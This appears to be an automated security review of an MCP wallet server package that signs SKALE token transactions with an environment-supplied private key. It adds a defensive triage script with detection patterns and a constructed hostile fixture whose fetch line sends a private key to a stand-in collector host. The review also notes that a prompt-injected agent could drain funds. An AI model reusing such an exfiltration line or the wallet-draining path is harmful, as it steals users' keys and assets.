AI Security Review
scanned 6h ago · by lpm-firewall-ai

The package is a user-invoked MCP server for SKALE confidential token operations. It exposes high-impact wallet actions to any configured MCP-compatible agent, but it does not install itself or modify other agents' configuration.
Static reason
High-risk behavior combination matched the malicious-package policy.
Trigger
Running privacy-mcp directly or through an MCP client, then invoking its registered tools.
Impact
An authorized or compromised agent session could move or unwrap the configured wallet's assets through the exposed tools.
Mechanism
MCP wallet-transaction tools that sign with a private key supplied through environment variables.
Attack narrative
At runtime, the CLI starts a stdio MCP server. Its tools read SKALE_RPC_URL, SKALE_PRIVATE_KEY (falling back to PRIVATE_KEY), and the wrapper addresses from environment variables, construct a viem wallet client from that key, and call SKALE privacy SDK methods including transfer, wrap, unwrap, balance decryption, and transfer reveal. This is documented package functionality rather than hidden install-time behavior, but it is a dangerous agent-facing capability when connected to an agent with broad autonomy: whatever can drive that agent's session (including a compromised or prompt-injected one) can drive the same signing tools.
Rationale
Source inspection shows no lifecycle hijack, persistence, exfiltration, or hidden code execution; the risky crypto actions are explicit MCP tools aligned with the package description. Because those tools can move funds when invoked by an AI agent, warn rather than block.
Evidence
package.json
dist/index.js
dist/bin.js
README.md
Decision evidence
public snapshot: AI called this Suspicious at 90.0% confidence as Dangerous Capability, with low false-positive risk.
Evidence for block
- dist/index.js registers MCP tools that can transfer, wrap, and unwrap tokens using the configured private key
- dist/bin.js starts an MCP stdio server exposing those tools to AI clients
- dist/index.js reads SKALE_PRIVATE_KEY/PRIVATE_KEY and sends transactions via viem walletClient
- README.md documents AI clients invoking send_private_payment and MCP config with private key env vars
Evidence against
- package.json has no install/preinstall/postinstall lifecycle hooks
- No code writes MCP/Claude/Cursor config or other agent control-surface files
- No child_process, eval/vm/Function, filesystem writes, or native/binary loading found
- Network use is via user-supplied SKALE_RPC_URL for package-aligned blockchain RPC operations
- No hardcoded exfiltration endpoint or secret logging/returning observed
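The two evidence lists above are a reproducible triage checklist. The script below is an added example, not lpm-firewall-ai's scanner and not code from the privacy-mcp package: it applies the same checks (lifecycle hooks, agent-config targets, child_process/eval/vm/Function, filesystem writes, native loading, hardcoded endpoints, secret env reads, transaction signing) to an in-memory package snapshot and reproduces the warn-rather-than-block decision. The package snapshots, file contents, regexes and the decide() policy are all constructed for illustration; the "hostile" variant is hypothetical and shows which findings would have flipped the verdict to block.

```javascript
// Added example: static triage over a package snapshot (not the scanner's own code).
// Inputs are constructed in-memory objects: { manifest: <package.json>, files: { path: source } }.

const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Source-level patterns. A "critical" hit alone blocks; "high"/"medium" hits are
// reported and only change the verdict in combination (see decide()).
const PATTERNS = [
  { kind: "child_process", severity: "high", re: /\bchild_process\b/ },
  { kind: "eval", severity: "high", re: /\beval\s*\(/ },
  { kind: "vm module", severity: "high", re: /["']vm["']/ },
  { kind: "Function constructor", severity: "high", re: /\bnew\s+Function\s*\(/ },
  { kind: "filesystem write", severity: "high", re: /\b(?:write|append)File(?:Sync)?\s*\(/ },
  { kind: "native/binary load", severity: "high", re: /\.node["']|\bprocess\.dlopen\b/ },
  { kind: "agent config path", severity: "critical", re: /claude_desktop_config\.json|\.cursor[\\/]|mcp\.json/ },
  { kind: "hardcoded endpoint", severity: "critical", re: /https?:\/\/[^\s"'`]+/ },
  { kind: "signs transactions", severity: "medium", re: /createWalletClient|sendTransaction|signTransaction/ },
  { kind: "reads secret env", severity: "medium", re: /process\.env\.[A-Z0-9_]*(?:PRIVATE_KEY|SECRET|MNEMONIC)\b/ },
];

// Collect findings from package.json scripts and every shipped source file.
function triage(pkg) {
  const findings = [];
  const scripts = pkg.manifest.scripts ?? {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (scripts[hook]) {
      findings.push({ kind: "lifecycle hook", severity: "critical", where: `package.json#scripts.${hook}` });
    }
  }
  for (const [file, src] of Object.entries(pkg.files)) {
    for (const p of PATTERNS) {
      const m = src.match(p.re);
      if (m) findings.push({ kind: p.kind, severity: p.severity, where: file, match: m[0] });
    }
  }
  return findings;
}

// Mirrors the review's rationale: install-time, agent-config or exfiltration behaviour
// blocks; an explicit signing capability fed by a secret env var only warns.
function decide(findings) {
  const has = (kind) => findings.some((f) => f.kind === kind);
  if (findings.some((f) => f.severity === "critical")) return "block";
  if (has("reads secret env") && has("signs transactions")) return "warn";
  return "allow";
}

// Constructed snapshot modelled on the flagged lines (not the real dist/index.js).
const benign = {
  manifest: { name: "example-mcp", scripts: { build: "tsc" } },
  files: {
    "dist/index.js": `
import { createWalletClient, http } from "viem";
import { privateKeyToAccount } from "viem/accounts";
const rpcUrl = process.env.SKALE_RPC_URL;
const privateKey = process.env.SKALE_PRIVATE_KEY ?? process.env.PRIVATE_KEY;
const account = privateKeyToAccount(privateKey);
const walletClient = createWalletClient({ account, transport: http(rpcUrl) });
export const transfer = (tx) => walletClient.sendTransaction(tx);
`,
  },
};

// Hypothetical variant (constructed, not observed in the package): a postinstall hook
// plus a hardcoded collector URL that receives the key. Either hit alone blocks.
const hostile = {
  manifest: { name: "example-mcp", scripts: { postinstall: "node dist/setup.js" } },
  files: {
    "dist/setup.js": `
const key = process.env.PRIVATE_KEY;
fetch("https://collector.invalid/k?v=" + key);
`,
  },
};

console.log(decide(triage(benign)), decide(triage(hostile))); // warn block
```

The benign snapshot yields only "signs transactions" and "reads secret env", which is exactly the combination the review downgrades to a warning; the hostile one trips two critical patterns. A real scanner would also resolve the trigger-reachable chain from manifest.main and the bin entry rather than scanning every file equally.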
Behavioral surface
Environment Vars
High Entropy Strings
No License
Source & flagged code
2 flagged

dist/bin.js (lines 14-19)

    import { createWalletClient, http } from "viem";
    import { privateKeyToAccount } from "viem/accounts";
    function getConfigFromEnv() {
        const rpcUrl = process.env.SKALE_RPC_URL;
        const privateKey = process.env.SKALE_PRIVATE_KEY ?? process.env.PRIVATE_KEY;
        const wrapperAddress = process.env.SKALE_WRAPPER_ADDRESS ?? process.env.WRAPPER_ADDRESS;
Critical: Wallet Drain (dist/bin.js, line 14)
Source uses private key material to transfer cryptocurrency funds.

dist/index.js (lines 9-14)
Trigger-reachable chain: manifest.main -> dist/index.js

    import { createWalletClient, http } from "viem";
    import { privateKeyToAccount } from "viem/accounts";
    function getConfigFromEnv() {
        const rpcUrl = process.env.SKALE_RPC_URL;
        const privateKey = process.env.SKALE_PRIVATE_KEY ?? process.env.PRIVATE_KEY;
        const wrapperAddress = process.env.SKALE_WRAPPER_ADDRESS ?? process.env.WRAPPER_ADDRESS;

Critical: Trigger Reachable Dangerous Capability (dist/index.js, line 9)
A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior. Here the reaching entrypoint is manifest.main; package.json has no lifecycle hooks, so the capability is reached only when the user runs the package, not at install time.

Findings
2 Critical · 2 Medium · 3 Low

Critical: Wallet Drain (dist/bin.js)
Critical: Trigger Reachable Dangerous Capability (dist/index.js)
Medium: Environment Vars
Medium: Structural Risk Force Deep Review
Low: Scripts Present
Low: High Entropy Strings
Low: No License